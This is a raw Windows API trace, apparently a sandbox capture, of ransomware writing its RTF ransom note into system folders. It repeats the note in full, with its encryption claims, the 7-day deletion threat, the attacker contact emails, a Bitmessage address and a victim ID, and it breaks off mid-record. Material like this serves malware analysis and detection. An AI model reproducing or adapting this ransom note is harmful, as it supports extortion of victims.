cchWideChar=8717, lpMultiByteStr=0x24607d8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nêpñ\x03]Ä\x0bõ5B\x18,", lpUsedDefaultChar=0x0) returned 8717 [0269.093] WriteFile (in: hFile=0x294, lpBuffer=0x24607d8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24607d8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.094] CloseHandle (hObject=0x294) returned 1 [0269.094] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\#readme_eman#.rtf")) returned 0xffffffff [0269.094] GetLastError () returned 0x2 [0269.094] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0269.599] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.599] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.599] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl 